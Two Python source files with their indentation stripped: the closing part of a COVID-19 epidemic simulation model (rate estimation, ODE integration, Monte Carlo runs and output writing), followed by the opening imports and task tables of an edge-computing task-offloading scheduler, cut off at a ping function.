tmp = tmp.previous_day_admission_adult_covid_confirmed + tmp.previous_day_admission_pediatric_covid_confirmed
cum_hosps = xp.zeros(adm1_cfr.shape)
tmp = tmp.unstack()
# embed()
tmp_data = tmp.T.cumsum().to_numpy()
tmp_ind = tmp.index.to_numpy()
cum_hosps[tmp_ind] = tmp_data.T
last_cases = (
g_data.rolling_cum_cases[-chr_delay - n_chr : -chr_delay] - g_data.rolling_cum_cases[-chr_delay - n_chr - 1]
)
# last_hosps = cum_hosps #g_data.rolling_cum_deaths[-n_chr:] - g_data.rolling_cum_deaths[-n_chr-1]
adm1_cases = g_data.sum_adm1(last_cases.T)
adm1_hosps = cum_hosps # g_data.sum_adm1(last_hosps.T)
adm1_chr = adm1_hosps / adm1_cases
# take harmonic mean over n days
self.adm1_current_chr = 1.0 / xp.mean(1.0 / adm1_chr, axis=1)
if self.debug:
logging.debug("Current CFR: " + pformat(self.adm1_current_cfr))
return g_data
def reset(self, seed=None, params=None):
"""Reset the state of the model and generate new inital data from a new random seed"""
# TODO we should refactor reset of the compartments to be real pop numbers then /Nij at the end
# if you set a seed using the constructor, you're stuck using it forever (TODO this isn't true anymore?)
if seed is not None:
random.seed(seed)
np.random.seed(seed)
xp.random.seed(seed)
self.iter = 0
# reroll model params if we're doing that kind of thing
self.g_data.Aij.perturb(self.consts.reroll_variance)
self.params = self.bucky_params.generate_params(self.consts.reroll_variance)
if params is not None:
self.params = copy.deepcopy(params)
if self.debug:
logging.debug("params: " + pformat(self.params, width=120))
for k in self.params:
if type(self.params[k]).__module__ == np.__name__:
self.params[k] = xp.asarray(self.params[k])
# TODO consolidate all the broadcast_to calls
self.params.H = xp.broadcast_to(self.params.H[:, None], self.Nij.shape)
self.params.F = xp.broadcast_to(self.params.F[:, None], self.Nij.shape)
"""
if self.use_G_ifr: # TODO this is pretty much overwriteen with the CHR rescale...
self.ifr[xp.isnan(self.ifr)] = 0.0
self.params.F = self.ifr / self.params["SYM_FRAC"]
adm0_ifr = xp.sum(self.ifr * self.Nij) / xp.sum(self.Nj)
ifr_scale = 0.0065 / adm0_ifr # TODO this should be in par file (its from planning scenario5)
self.params.F = xp.clip(self.params.F * ifr_scale, 0.0, 1.0)
self.params.F_old = self.params.F.copy()
"""
if self.rescale_chr:
# TODO this needs to be cleaned up BAD
# should add a util function to do the rollups to adm1 (it shows up in case_reporting/doubling t calc too)
# TODO this could be a population distribute type func...
adm1_Fi = self.g_data.sum_adm1((self.params.F * self.Nij).T).T
adm1_Ni = self.g_data.adm1_Nij # sum_adm1(self.Nij.T)
adm1_N = self.g_data.adm1_Nj # sum_adm1(self.Nj)
adm1_Fi = adm1_Fi / adm1_Ni # TODO this will always be F, not sure what I was going for here...
adm1_F = xp.nanmean(adm1_Fi, axis=0)
adm1_F_fac = self.adm1_current_cfr / adm1_F
adm0_F_fac = xp.nanmean(adm1_N * adm1_F_fac) / xp.sum(adm1_N)
adm1_F_fac[xp.isnan(adm1_F_fac)] = adm0_F_fac
F_RR_fac = truncnorm(1.0, self.dists.F_RR_var, size=adm1_F_fac.size, a_min=1e-6)
adm1_F_fac = adm1_F_fac * F_RR_fac
adm1_F_fac = xp.clip(adm1_F_fac, a_min=0.1, a_max=10.0) # prevent extreme values
if self.debug:
logging.debug("adm1 cfr rescaling factor: " + pformat(adm1_F_fac))
self.params.F = self.params.F * adm1_F_fac[self.g_data.adm1_id]
self.params.F = xp.clip(self.params.F, a_min=1.0e-10, a_max=1.0)
adm1_Hi = self.g_data.sum_adm1((self.params.H * self.Nij).T).T
# adm1_Ni = self.g_data.sum_adm1(self.Nij.T)
adm1_Hi = adm1_Hi / adm1_Ni
adm1_H = xp.nanmean(adm1_Hi, axis=0)
adm1_H_fac = self.adm1_current_chr / adm1_H
adm0_H_fac = xp.nanmean(adm1_N * adm1_H_fac) / xp.sum(adm1_N)
adm1_H_fac[xp.isnan(adm1_H_fac)] = adm0_H_fac
H_RR_fac = truncnorm(1.0, self.dists.H_RR_var, size=adm1_H_fac.size, a_min=1e-6)
adm1_H_fac = adm1_H_fac * H_RR_fac
adm1_H_fac = xp.clip(adm1_H_fac, a_min=0.1, a_max=10.0) # prevent extreme values
if self.debug:
logging.debug("adm1 chr rescaling factor: " + pformat(adm1_H_fac))
self.params.H = self.params.H * adm1_H_fac[self.g_data.adm1_id]
self.params.H = xp.clip(self.params.H, a_min=self.params.F, a_max=1.0)
# crr_days_needed = max( #TODO this depends on all the Td params, and D_REPORT_TIME...
case_reporting = self.estimate_reporting(
self.g_data,
self.params,
cfr=self.params.F,
days_back=22,
min_deaths=self.consts.case_reporting_min_deaths,
)
self.case_reporting = approx_mPERT_sample( # TODO these facs should go in param file
mu=xp.clip(case_reporting, a_min=0.2, a_max=1.0),
a=xp.clip(0.8 * case_reporting, a_min=0.2, a_max=None),
b=xp.clip(1.2 * case_reporting, a_min=None, a_max=1.0),
gamma=50.0,
)
self.doubling_t = xp.zeros(self.Nj.shape)
# self.doubling_t = estimate_doubling_time(g_data,
# doubling_time_window=self.consts.doubling_t_window,
# mean_time_window=self.consts.doubling_t_N_historical_days,
# self.case_reporting,
# )
# if xp.any(~xp.isfinite(self.doubling_t)):
# logging.info("non finite doubling times, is there enough case data?")
# if self.debug:
# logging.debug(self.doubling_t)
# logging.debug(self.g_data.adm1_id[~xp.isfinite(self.doubling_t)])
# raise SimulationException
# if self.consts.reroll_variance > 0.0:
# self.doubling_t *= truncnorm(1.0, self.consts.reroll_variance, size=self.doubling_t.shape, a_min=1e-6)
# self.doubling_t = xp.clip(self.doubling_t, 1.0, None) / 2.0
# self.params = self.bucky_params.rescale_doubling_rate(self.doubling_t, self.params, self.g_data.Aij.diag)
mean_case_reporting = xp.mean(self.case_reporting[-self.consts.case_reporting_N_historical_days :], axis=0)
self.params["CASE_REPORT"] = mean_case_reporting
self.params["THETA"] = xp.broadcast_to(
self.params["THETA"][:, None], self.Nij.shape
) # TODO move all the broadcast_to's to one place, they're all over reset()
self.params["GAMMA_H"] = xp.broadcast_to(self.params["GAMMA_H"][:, None], self.Nij.shape)
self.params["F_eff"] = xp.clip(self.params["F"] / self.params["H"], 0.0, 1.0)
Rt = estimate_Rt(self.g_data, self.params)
Rt_fac = approx_mPERT_sample(**(self.dists.Rt_dist))
Rt *= Rt_fac # truncnorm(1.0, 1.5 * self.consts.reroll_variance, size=Rt.shape, a_min=1e-6)
self.params["R0"] = Rt
self.params["BETA"] = Rt * self.params["GAMMA"] / self.g_data.Aij.diag
# init state vector (self.y)
yy = buckyState(self.consts, self.Nij)
if self.debug:
logging.debug("case init")
Ti = self.params.Ti
current_I = xp.sum(frac_last_n_vals(self.g_data.inc_case_hist, Ti, axis=0), axis=0)
current_I[xp.isnan(current_I)] = 0.0
current_I[current_I < 0.0] = 0.0
current_I *= 1.0 / (self.params["CASE_REPORT"])
# Roll some random factors for the init compartment values
R_fac = approx_mPERT_sample(**(self.dists.R_fac_dist))
E_fac = approx_mPERT_sample(**(self.dists.E_fac_dist))
H_fac = approx_mPERT_sample(**(self.dists.H_fac_dist))
I_init = E_fac * current_I[None, :] / self.Nij / self.n_age_grps
D_init = self.g_data.cum_death_hist[-1][None, :] / self.Nij / self.n_age_grps
recovered_init = (
self.g_data.cum_case_hist[-1] / self.params["SYM_FRAC"] / (self.params["CASE_REPORT"])
) * R_fac
R_init = (
(recovered_init) / self.Nij / self.n_age_grps - D_init - I_init / self.params["SYM_FRAC"]
) # rh handled later
# self.params.H = self.params.H * H_fac
# ic_frac = 1.0 / (1.0 + self.params.THETA / self.params.GAMMA_H)
# hosp_frac = 1.0 / (1.0 + self.params.GAMMA_H / self.params.THETA)
# print(ic_frac + hosp_frac)
exp_frac = (
E_fac
* xp.ones(I_init.shape[-1])
# * np.diag(self.A)
# * np.sum(self.A, axis=1)
* (self.params.R0) # @ self.A)
* self.params.GAMMA
/ self.params.SIGMA
)
ic_fac = 1.0
yy.I = (1.0 - self.params.H) * I_init / yy.Im
yy.Ic = ic_fac * self.params.H * I_init / yy.Im
yy.Rh = self.params.H * I_init * self.params.GAMMA_H / self.params.THETA / yy.Rhn
if self.rescale_chr:
adm1_hosp = xp.zeros((self.g_data.max_adm1 + 1,), dtype=float)
xp.scatter_add(adm1_hosp, self.g_data.adm1_id, xp.sum(yy.Rh * self.Nij, axis=(0, 1)))
adm2_hosp_frac = (self.adm1_current_hosp / adm1_hosp)[self.g_data.adm1_id]
adm0_hosp_frac = xp.nansum(self.adm1_current_hosp) / xp.nansum(adm1_hosp)
adm2_hosp_frac[xp.isnan(adm2_hosp_frac)] = adm0_hosp_frac
# self.params.F = 2. * xp.clip(1.0 / (H_fac * adm2_hosp_frac[None, :]) * self.params.F, 1.0e-10, 1.0)
# self.params.H = xp.clip(H_fac * self.params.H * adm2_hosp_frac[None, :], self.params.F, 1.0)
# TODO this .85 should be in param file...
scaling_F = self.consts.F_scaling
scaling_H = adm2_hosp_frac * H_fac
self.params["F_eff"] = xp.clip(scaling_F * self.params["F"] / self.params["H"], 0.0, 1.0)
# yy.I = (1.0 - self.params.H) * I_init / yy.Im
# y[Ici] = ic_frac * self.params.H * I_init / (len(Ici))
# y[Rhi] = hosp_frac * self.params.H * I_init / (Rhn)
yy.Ic = scaling_H * ic_fac * self.params.H * I_init / yy.Im
yy.Rh = (
scaling_H
# * self.params.CASE_REPORT
* self.params.H
* I_init
* self.params.GAMMA_H
/ self.params.THETA
/ yy.Rhn
)
R_init -= xp.sum(yy.Rh, axis=0)
yy.Ia = self.params.ASYM_FRAC / self.params.SYM_FRAC * I_init / yy.Im
yy.E = exp_frac[None, :] * I_init / yy.En
yy.R = R_init
yy.D = D_init
yy.init_S()
# init the bin we're using to track incident cases (it's filled with cumulatives until we diff it later)
yy.incC = self.g_data.cum_case_hist[-1][None, :] / self.Nij / self.n_age_grps
self.y = yy
# TODO assert this is 1. (need to take mean and around b/c fp err)
# if xp.sum(self.y, axis=0)
if xp.any(~xp.isfinite(self.y.state)):
logging.info("nonfinite values in the state vector, something is wrong with init")
raise SimulationException
if self.debug:
logging.debug("done reset()")
# return y
    # @staticmethod: need to move the caching out b/c it's in the self namespace
def estimate_reporting(self, g_data, params, cfr, days_back=14, case_lag=None, min_deaths=100.0):
"""Estimate the case reporting rate based off observed vs. expected CFR"""
if case_lag is None:
adm0_cfr_by_age = xp.sum(cfr * g_data.Nij, axis=1) / xp.sum(g_data.Nj, axis=0)
adm0_cfr_total = xp.sum(
xp.sum(cfr * g_data.Nij, axis=1) / xp.sum(g_data.Nj, axis=0),
axis=0,
)
case_lag = xp.sum(params["D_REPORT_TIME"] * adm0_cfr_by_age / adm0_cfr_total, axis=0)
case_lag_int = int(case_lag)
recent_cum_cases = g_data.rolling_cum_cases - g_data.rolling_cum_cases[0]
recent_cum_deaths = g_data.rolling_cum_deaths - g_data.rolling_cum_deaths[0]
case_lag_frac = case_lag % 1 # TODO replace with util function for the indexing
cases_lagged = frac_last_n_vals(recent_cum_cases, days_back + case_lag_frac, offset=case_lag_int)
if case_lag_frac:
cases_lagged = cases_lagged[0] + cases_lagged[1:]
# adm0
adm0_cfr_param = xp.sum(xp.sum(cfr * g_data.Nij, axis=1) / xp.sum(g_data.Nj, axis=0), axis=0)
if self.adm0_cfr_reported is None:
self.adm0_cfr_reported = xp.sum(recent_cum_deaths[-days_back:], axis=1) / xp.sum(cases_lagged, axis=1)
adm0_case_report = adm0_cfr_param / self.adm0_cfr_reported
"""
if self.debug:
logging.debug("Adm0 case reporting rate: " + pformat(adm0_case_report))
if xp.any(~xp.isfinite(adm0_case_report)):
if self.debug:
logging.debug("adm0 case report not finite")
logging.debug(adm0_cfr_param)
logging.debug(self.adm0_cfr_reported)
raise SimulationException
"""
case_report = xp.repeat(adm0_case_report[:, None], cases_lagged.shape[-1], axis=1)
# adm1
adm1_cfr_param = xp.zeros((g_data.max_adm1 + 1,), dtype=float)
adm1_totpop = g_data.adm1_Nj # xp.zeros((self.g_data.max_adm1 + 1,), dtype=float)
tmp_adm1_cfr = xp.sum(cfr * g_data.Nij, axis=0)
xp.scatter_add(adm1_cfr_param, g_data.adm1_id, tmp_adm1_cfr)
# xp.scatter_add(adm1_totpop, self.g_data.adm1_id, self.Nj)
adm1_cfr_param /= adm1_totpop
# adm1_cfr_reported is const, only calc it once and cache it
if self.adm1_cfr_reported is None:
self.adm1_deaths_reported = xp.zeros((g_data.max_adm1 + 1, days_back), dtype=float)
adm1_lagged_cases = xp.zeros((g_data.max_adm1 + 1, days_back), dtype=float)
xp.scatter_add(
self.adm1_deaths_reported,
g_data.adm1_id,
recent_cum_deaths[-days_back:].T,
)
xp.scatter_add(adm1_lagged_cases, g_data.adm1_id, cases_lagged.T)
self.adm1_cfr_reported = self.adm1_deaths_reported / adm1_lagged_cases
adm1_case_report = (adm1_cfr_param[:, None] / self.adm1_cfr_reported)[g_data.adm1_id].T
valid_mask = (self.adm1_deaths_reported > min_deaths)[g_data.adm1_id].T & xp.isfinite(adm1_case_report)
case_report[valid_mask] = adm1_case_report[valid_mask]
# adm2
adm2_cfr_param = xp.sum(cfr * (g_data.Nij / g_data.Nj), axis=0)
if self.adm2_cfr_reported is None:
self.adm2_cfr_reported = recent_cum_deaths[-days_back:] / cases_lagged
adm2_case_report = adm2_cfr_param / self.adm2_cfr_reported
valid_adm2_cr = xp.isfinite(adm2_case_report) & (recent_cum_deaths[-days_back:] > min_deaths)
case_report[valid_adm2_cr] = adm2_case_report[valid_adm2_cr]
return case_report
#
    # RHS for the ODEs - d(state)/dt = F(t, state, *mats, *pars)
# NB: requires the state vector be 1d
#
@staticmethod
def RHS_func(t, y_flat, Nij, contact_mats, Aij, par, npi, aij_sparse, y):
"""RHS function for the ODEs, get's called in ivp.solve_ivp"""
# constraint on values
lower, upper = (0.0, 1.0) # bounds for state vars
# grab index of OOB values so we can zero derivatives (stability...)
too_low = y_flat <= lower
too_high = y_flat >= upper
# TODO we're passing in y.state just to overwrite it, we probably need another class
# reshape to the usual state tensor (compartment, age, node)
y.state = y_flat.reshape(y.state_shape)
# Clip state to be in bounds (except allocs b/c thats a counter)
xp.clip(y.state, a_min=lower, a_max=upper, out=y.state)
# init d(state)/dt
dy = y.zeros_like()
# effective params after damping w/ allocated stuff
if npi["npi_active"]:
            # We want to avoid doing this int cast if we aren't using NPIs b/c it forces a sync
t_index = min(int(t), npi["r0_reduct"].shape[0] - 1) # prevent OOB error when integrator overshoots
BETA_eff = npi["r0_reduct"][t_index] * par["BETA"]
else:
BETA_eff = par["BETA"]
F_eff = par["F_eff"]
HOSP = par["H"]
THETA = y.Rhn * par["THETA"]
GAMMA = y.Im * par["GAMMA"]
GAMMA_H = y.Im * par["GAMMA_H"]
SIGMA = y.En * par["SIGMA"]
SYM_FRAC = par["SYM_FRAC"]
CASE_REPORT = par["CASE_REPORT"]
if npi["npi_active"]:
Cij = npi["contact_weights"][t_index] * contact_mats
# TODO this should be c + c.T / 2
Cij = xp.sum(Cij, axis=1)
Cij /= xp.sum(Cij, axis=2, keepdims=True)
else:
Cij = contact_mats
if npi["npi_active"]:
if aij_sparse:
Aij_eff = Aij.multiply(npi["mobility_reduct"][t_index])
else:
Aij_eff = npi["mobility_reduct"][t_index] * Aij
else:
Aij_eff = Aij
# perturb Aij
# new_R0_fracij = truncnorm(xp, 1.0, .1, size=Aij.shape, a_min=1e-6)
# new_R0_fracij = xp.clip(new_R0_fracij, 1e-6, None)
# A = Aij * new_R0_fracij
# Aij_eff = A / xp.sum(A, axis=0)
# Infectivity matrix (I made this name up, idk what its really called)
I_tot = xp.sum(Nij * y.Itot, axis=0) - (1.0 - par["rel_inf_asym"]) * xp.sum(Nij * y.Ia, axis=0)
# I_tmp = (Aij.T @ I_tot.T).T
if aij_sparse:
I_tmp = (Aij_eff.T * I_tot.T).T
else:
I_tmp = I_tot @ Aij # using identity (A@B).T = B.T @ A.T
# beta_mat = y.S * xp.squeeze((Cij @ I_tmp.T[..., None]), axis=-1).T
beta_mat = y.S * (Cij @ xp.atleast_3d(I_tmp.T)).T[0]
beta_mat /= Nij
# dS/dt
dy.S = -BETA_eff * (beta_mat)
# dE/dt
dy.E[0] = BETA_eff * (beta_mat) - SIGMA * y.E[0]
dy.E[1:] = SIGMA * (y.E[:-1] - y.E[1:])
# dI/dt
dy.Ia[0] = (1.0 - SYM_FRAC) * SIGMA * y.E[-1] - GAMMA * y.Ia[0]
dy.Ia[1:] = GAMMA * (y.Ia[:-1] - y.Ia[1:])
# dIa/dt
dy.I[0] = SYM_FRAC * (1.0 - HOSP) * SIGMA * y.E[-1] - GAMMA * y.I[0]
dy.I[1:] = GAMMA * (y.I[:-1] - y.I[1:])
# dIc/dt
dy.Ic[0] = SYM_FRAC * HOSP * SIGMA * y.E[-1] - GAMMA_H * y.Ic[0]
dy.Ic[1:] = GAMMA_H * (y.Ic[:-1] - y.Ic[1:])
# dRhi/dt
dy.Rh[0] = GAMMA_H * y.Ic[-1] - THETA * y.Rh[0]
dy.Rh[1:] = THETA * (y.Rh[:-1] - y.Rh[1:])
# dR/dt
dy.R = GAMMA * (y.I[-1] + y.Ia[-1]) + (1.0 - F_eff) * THETA * y.Rh[-1]
# dD/dt
dy.D = F_eff * THETA * y.Rh[-1]
dy.incH = GAMMA_H * y.Ic[-1] # SYM_FRAC * HOSP * SIGMA * y.E[-1]
dy.incC = SYM_FRAC * CASE_REPORT * SIGMA * y.E[-1]
# bring back to 1d for the ODE api
dy_flat = dy.state.ravel()
# zero derivatives for things we had to clip if they are going further out of bounds
dy_flat = xp.where(too_low & (dy_flat < 0.0), 0.0, dy_flat)
dy_flat = xp.where(too_high & (dy_flat > 0.0), 0.0, dy_flat)
return dy_flat
def run_once(self, seed=None):
"""Perform one complete run of the simulation"""
# rename to integrate or something? it also resets...
# reset everything
logging.debug("Resetting state")
self.reset(seed=seed)
logging.debug("Done reset")
# do integration
logging.debug("Starting integration")
t_eval = xp.arange(0, self.t_max + self.dt, self.dt)
sol = xp_ivp.solve_ivp(
self.RHS_func,
method="RK23",
t_span=(0.0, self.t_max),
y0=self.y.state.ravel(),
t_eval=t_eval,
args=(self.Nij, self.Cij, self.g_data.Aij.A, self.params, self.npi_params, self.g_data.Aij.sparse, self.y),
)
logging.debug("Done integration")
return sol
def run_multiple(self, n_mc, base_seed=42, out_columns=None):
"""Perform multiple monte carlos and return their postprocessed results"""
seed_seq = np.random.SeedSequence(base_seed)
success = 0
ret = []
pbar = tqdm.tqdm(total=n_mc, desc="Performing Monte Carlos", dynamic_ncols=True)
while success < n_mc:
mc_seed = seed_seq.spawn(1)[0].generate_state(1)[0] # inc spawn key then grab next seed
pbar.set_postfix_str(
"seed=" + str(mc_seed),
refresh=True,
)
try:
with xp.optimize_kernels():
sol = self.run_once(seed=mc_seed)
df_data = self.postprocess_run(sol, mc_seed, out_columns)
ret.append(df_data)
success += 1
pbar.update(1)
except SimulationException:
pass
pbar.close()
return ret
    # TODO Move this to a class that's like run_parser or something (that caches all the info it needs like Nij, and manages the write thread/queue)
# Also give it methods like to_dlpack, to_pytorch, etc
def to_feather(self, sol, base_filename, seed, output_queue):
"""Postprocess and write to disk the output of run_once"""
df_data = self.postprocess_run(sol, seed)
# flatten the shape
for c in df_data:
df_data[c] = df_data[c].ravel()
# push the data off to the write thread
output_queue.put((base_filename, df_data))
# TODO we should output the per monte carlo param rolls, this got lost when we switched from hdf5
def postprocess_run(self, sol, seed, columns=None):
"""Process the output of a run (sol, returned by the integrator) into the requested output vars"""
if columns is None:
columns = [
"adm2_id",
"date",
"rid",
"total_population",
"current_hospitalizations",
"active_asymptomatic_cases",
"cumulative_deaths",
"daily_hospitalizations",
"daily_cases",
"daily_reported_cases",
"daily_deaths",
"cumulative_cases",
"cumulative_reported_cases",
"current_icu_usage",
"current_vent_usage",
"case_reporting_rate",
"R_eff",
"doubling_t",
]
columns = set(columns)
df_data = {}
out = buckyState(self.consts, self.Nij)
y = sol.y.reshape(self.y.state_shape + (sol.y.shape[-1],))
# rescale by population
out.state = self.Nij[None, ..., None] * y
# collapse age groups
out.state = xp.sum(out.state, axis=1)
# population_conserved = (xp.diff(xp.around(xp.sum(out.N, axis=(0, 1)), 1)) == 0.0).all()
# if not population_conserved:
# pass # TODO we're getting small fp errors here
# # print(xp.sum(xp.diff(xp.around(xp.sum(out[:incH], axis=(0, 1)), 1))))
# # logging.error("Population not conserved!")
# # print(xp.sum(xp.sum(y[:incH],axis=0)-1.))
# # raise SimulationException
if "adm2_id" in columns:
adm2_ids = np.broadcast_to(self.g_data.adm2_id[:, None], out.state.shape[1:])
df_data["adm2_id"] = adm2_ids
if "date" in columns:
if self.output_dates is None:
t_output = xp.to_cpu(sol.t)
dates = [pd.Timestamp(self.first_date + datetime.timedelta(days=np.round(t))) for t in t_output]
self.output_dates = np.broadcast_to(dates, out.state.shape[1:])
dates = self.output_dates
df_data["date"] = dates
if "rid" in columns:
df_data["rid"] = np.broadcast_to(seed, out.state.shape[1:])
if "current_icu_usage" in columns or "current_vent_usage" in columns:
icu = self.Nij[..., None] * self.params["ICU_FRAC"][:, None, None] * xp.sum(y[out.indices["Rh"]], axis=0)
if "current_icu_usage" in columns:
df_data["current_icu_usage"] = xp.sum(icu, axis=0)
if "current_vent_usage" in columns:
vent = self.params.ICU_VENT_FRAC[:, None, None] * icu
df_data["current_vent_usage"] = xp.sum(vent, axis=0)
if "daily_deaths" in columns:
            # prepend the min cumulative deaths over the last 2 days in case they decreased
prepend_deaths = xp.minimum(self.g_data.cum_death_hist[-2], self.g_data.cum_death_hist[-1])
daily_deaths = xp.diff(out.D, prepend=prepend_deaths[:, None], axis=-1)
df_data["daily_deaths"] = daily_deaths
if self.reject_runs:
init_inc_death_mean = xp.mean(xp.sum(daily_deaths[:, 1:4], axis=0))
hist_inc_death_mean = xp.mean(xp.sum(self.g_data.inc_death_hist[-7:], axis=-1))
inc_death_rejection_fac = 2.0 # TODO These should come from the cli arg -r
if (init_inc_death_mean > inc_death_rejection_fac * hist_inc_death_mean) or (
inc_death_rejection_fac * init_inc_death_mean < hist_inc_death_mean
):
logging.info("Inconsistent inc deaths, rejecting run")
raise SimulationException
if "daily_cases" in columns or "daily_reported_cases" in columns:
            # prepend the min cumulative cases over the last 2 days in case they decreased
prepend_cases = xp.minimum(self.g_data.cum_case_hist[-2], self.g_data.cum_case_hist[-1])
daily_reported_cases = xp.diff(out.incC, axis=-1, prepend=prepend_cases[:, None])
if self.reject_runs:
init_inc_case_mean = xp.mean(xp.sum(daily_reported_cases[:, 1:4], axis=0))
hist_inc_case_mean = xp.mean(xp.sum(self.g_data.inc_case_hist[-7:], axis=-1))
inc_case_rejection_fac = 1.5 # TODO These should come from the cli arg -r
if (init_inc_case_mean > inc_case_rejection_fac * hist_inc_case_mean) or (
inc_case_rejection_fac * init_inc_case_mean < hist_inc_case_mean
):
logging.info("Inconsistent inc cases, rejecting run")
raise SimulationException
if "daily_reported_cases" in columns:
df_data["daily_reported_cases"] = daily_reported_cases
if "daily_cases" in columns:
daily_cases_total = daily_reported_cases / self.params.CASE_REPORT[:, None]
df_data["daily_cases"] = daily_cases_total
if "cumulative_reported_cases" in columns:
cum_cases_reported = out.incC
df_data["cumulative_reported_cases"] = cum_cases_reported
if "cumulative_cases" in columns:
cum_cases_total = out.incC / self.params.CASE_REPORT[:, None]
df_data["cumulative_cases"] = cum_cases_total
if "daily_hospitalizations" in columns:
out.incH[:, 0] = out.incH[:, 1]
daily_hosp = xp.diff(out.incH, axis=-1, prepend=out.incH[:, 0][..., None])
df_data["daily_hospitalizations"] = daily_hosp
if "total_population" in columns:
N = xp.broadcast_to(self.Nj[..., None], out.state.shape[1:])
df_data["total_population"] = N
if "current_hospitalizations" in columns:
hosps = xp.sum(out.Rh, axis=0) # why not just using .H?
df_data["current_hospitalizations"] = hosps
if "cumulative_deaths" in columns:
cum_deaths = out.D
df_data["cumulative_deaths"] = cum_deaths
if "active_asymptomatic_cases" in columns:
asym_I = xp.sum(out.Ia, axis=0)
df_data["active_asymptomatic_cases"] = asym_I
if "case_reporting_rate" in columns:
crr = xp.broadcast_to(self.params.CASE_REPORT[:, None], adm2_ids.shape)
df_data["case_reporting_rate"] = crr
if "R_eff" in columns:
r_eff = self.npi_params["r0_reduct"].T * np.broadcast_to(
(self.params.R0 * self.g_data.Aij.diag)[:, None], adm2_ids.shape
)
df_data["R_eff"] = r_eff
if "doubling_t" in columns:
Td = np.broadcast_to(self.doubling_t[:, None], adm2_ids.shape)
df_data["doubling_t"] = Td
# Collapse the gamma-distributed compartments and move everything to cpu
negative_values = False
for k in df_data:
# if df_data[k].ndim == 2:
# df_data[k] = xp.sum(df_data[k], axis=0)
if k != "date" and xp.any(xp.around(df_data[k], 2) < 0.0):
logging.info("Negative values present in " + k)
negative_values = True
if negative_values and self.reject_runs:
logging.info("Rejecting run b/c of negative values in output")
raise SimulationException
return df_data
def main(args=None):
"""Main method for a complete simulation called with a set of CLI args"""
if args is None:
args = sys.argv[1:]
args = parser.parse_args(args=args)
if args.gpu:
logging.info("Using GPU backend")
use_cupy(optimize=args.opt)
reimport_numerical_libs("model.main.main")
warnings.simplefilter(action="ignore", category=xp.ExperimentalWarning)
if not os.path.exists(args.output_dir):
os.mkdir(args.output_dir)
loglevel = 30 - 10 * min(args.verbosity, 2)
runid = get_runid()
# Setup output folder TODO change over to pathlib
output_folder = os.path.join(args.output_dir, runid)
if not os.path.exists(output_folder):
os.mkdir(output_folder)
fh = logging.FileHandler(output_folder + "/stdout")
fh.setLevel(logging.DEBUG)
logging.basicConfig(
level=loglevel,
format="%(asctime)s - %(levelname)s - %(filename)s:%(funcName)s:%(lineno)d - %(message)s",
handlers=[TqdmLoggingHandler()],
)
debug_mode = loglevel < 20
# TODO we should output the logs to output_dir too...
_banner()
# TODO move the write_thread stuff to a util (postprocess uses something similar)
to_write = queue.Queue(maxsize=100)
def writer():
"""Write thread loop that pulls from an async queue"""
# Call to_write.get() until it returns None
stream = xp.cuda.Stream(non_blocking=True) if args.gpu else None
for base_fname, df_data in iter(to_write.get, None):
cpu_data = {k: xp.to_cpu(v, stream=stream) for k, v in df_data.items()}
if stream is not None:
stream.synchronize()
df = pd.DataFrame(cpu_data)
for date, date_df in df.groupby("date", as_index=False):
fname = base_fname + "_" + str(date.date()) + ".feather"
date_df.reset_index().to_feather(fname)
write_thread = threading.Thread(target=writer, daemon=True)
write_thread.start()
logging.info(f"command line args: {args}")
env = buckyModelCovid(
debug=debug_mode,
sparse_aij=(not args.dense),
t_max=args.days,
graph_file=args.graph_file,
par_file=args.par_file,
npi_file=args.npi_file,
disable_npi=args.disable_npi,
reject_runs=args.reject_runs,
)
seed_seq = np.random.SeedSequence(args.seed)
total_start = datetime.datetime.now()
success = 0
n_runs = 0
pbar = tqdm.tqdm(total=args.n_mc, desc="Performing Monte Carlos", dynamic_ncols=True)
try:
while success < args.n_mc:
mc_seed = seed_seq.spawn(1)[0].generate_state(1)[0] # inc spawn key then grab next seed
pbar.set_postfix_str(
"seed="
+ str(mc_seed)
+ ", rej%=" # TODO disable rej% if not -r
+ str(np.around(float(n_runs - success) / (n_runs + 0.00001) * 100, 1)),
refresh=True,
)
try:
n_runs += 1
with xp.optimize_kernels():
sol = env.run_once(seed=mc_seed)
base_filename = os.path.join(output_folder, str(mc_seed))
env.to_feather(sol, base_filename, mc_seed, output_queue=to_write)
success += 1
pbar.update(1)
except SimulationException:
pass
except (KeyboardInterrupt, SystemExit):
logging.warning("Caught SIGINT, cleaning up")
to_write.put(None)
write_thread.join()
finally:
to_write.put(None)
write_thread.join()
pbar.close()
logging.info(f"Total runtime: {datetime.datetime.now() - total_start}")
if __name__ == "__main__":
main()
|
algo_four.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1]  # keeps count of how many deadlocks have been resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list], {wait_time}] => records tasks re-offloaded to the MEC for execution.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
received_time = []
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
